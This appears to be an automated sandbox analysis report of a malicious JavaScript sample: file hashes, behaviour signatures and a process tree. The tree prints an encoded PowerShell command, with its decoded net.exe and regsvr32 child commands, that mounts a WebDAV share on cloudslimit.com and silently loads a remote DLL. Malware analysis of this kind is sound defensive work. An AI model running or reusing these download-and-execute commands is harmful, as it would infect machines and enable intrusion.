Analysis
-
max time kernel
16s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
21/08/2024, 14:00
Static task
static1
Behavioral task
behavioral1
Sample
39cda86877b3fa80a81b335f29ddf729050add464601e91180671fbc03a86eee.js
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
39cda86877b3fa80a81b335f29ddf729050add464601e91180671fbc03a86eee.js
Resource
win10v2004-20240802-en
General
-
Target
39cda86877b3fa80a81b335f29ddf729050add464601e91180671fbc03a86eee.js
-
Size
10KB
-
MD5
917a26523c6c25a7071fadea8b57a2bb
-
SHA1
87edae2eba0e487edc23e198bfa0b48dab88f954
-
SHA256
39cda86877b3fa80a81b335f29ddf729050add464601e91180671fbc03a86eee
-
SHA512
5d8100cd612d52c62d1e5f658ae630f2e2e6c8822e959436b3c94095dba335b1722229145b91a2f72838f40662d47574ad155d641528a1ad1edafe35d49cf451
-
SSDEEP
192:UzXSYZDmeOlo8BVlmnfpblPDuwWftAQ0KnHkR:UzXLZmeOWznawWiQu
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2696 2212 wscript.exe 30 PID 2212 wrote to memory of 2696 2212 wscript.exe 30 PID 2212 wrote to memory of 2696 2212 wscript.exe 30 PID 2696 wrote to memory of 2760 2696 powershell.exe 32 PID 2696 wrote to memory of 2760 2696 powershell.exe 32 PID 2696 wrote to memory of 2760 2696 powershell.exe 32 PID 2696 wrote to memory of 2880 2696 powershell.exe 33 PID 2696 wrote to memory of 2880 2696 powershell.exe 33 PID 2696 wrote to memory of 2880 2696 powershell.exe 33 PID 2696 wrote to memory of 2880 2696 powershell.exe 33 PID 2696 wrote to memory of 2880 2696 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\39cda86877b3fa80a81b335f29ddf729050add464601e91180671fbc03a86eee.js1⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADkANwA2ADMAMgA4ADkAMwA4ADIAMQA3ADIALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2760
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\19763289382172.dll3⤵PID:2880
-
-